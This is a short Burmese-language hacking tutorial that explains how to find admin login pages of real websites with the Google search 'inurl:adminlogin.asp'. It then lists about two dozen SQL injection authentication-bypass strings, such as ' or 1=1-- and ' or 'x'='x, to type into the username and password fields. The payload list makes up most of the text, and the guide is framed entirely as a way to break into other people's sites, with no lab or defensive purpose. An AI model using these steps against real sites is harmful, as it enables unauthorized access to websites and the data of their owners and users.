SQL လံုး၀မသိရင္ ဒီလိုဟက္မယ္

1) အရင္ဆုံး google.com ကုိသြားလုိက္.....
2) search မွာ inurl:adminlogin.asp လုိ႔ type ျပီးရွာလုိက္ (ေတြ႔လိမ္႔မယ္...ပုံေနတာပဲ ) ။
3) အဲဒီထဲကမွ admin panel ကုိဝင္လုိ႔ရမဲ႔ ဆုိက္ေတြကုိလုိက္ရွာ.....
4) user name = admin ; password = 'or''=' ကုိသုံးျပီးရွာပါ ။ တစ္ခ်ဳိ႔ password field ေနရာေတြမွာ ေအာက္မွာျပထားသလုိ SQL query ေတြနဲလဲဝင္လုိ႔ရပါတယ္
ကိုယ္တုိက္ခုိက္မယ့္ ဆုိက္ဒ္ဟာ SQL Server ေတာ့သုံးထားရပါမယ္ ။ ေအာက္ကကုဒ္ေတြကေတာ့ SQL ရဲ႕ ဆရာ့ဆရာေတြ ထြင္သြားတဲ့နည္းပါ ။ (SQL ကၽြမ္းက်င္ေသာ Programmer မ်ားကိုမဆုိလုိပါ ။ SQL ရဲ႕ vulnerable ကိုရွာႏုိင္ေသာပုဂၢဳိလ္မ်ားကိုဆုိလုိပါတယ္ ။ ) ။ ေအာက္ပါေပးထားတဲ့နည္းကေတာ့ SQL ဆုိက္ဒ္ေတြကို ၀င္လုိ႕ရတဲ့ User Name နဲ႕ Password ေတြပါ ။ SQL Inject တစ္ခုမွ်သာျဖစ္ပါတယ္ ။

CODE:

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

            အထက္ပါ ကုဒ္ေတြကိုဘယ္လုိအသုံးခ်မလဲ ?

လြယ္ပါတယ္ Inject ကုဒ္တစ္ခုခ်င္းစီကို Login ရဲ႕ UserNameနဲ႕ Password မွာ႐ိုက္ထည့္ေပးလုိက္႐ုံပဲျဖစ္ပါတယ္ ။

 Credit-WYTU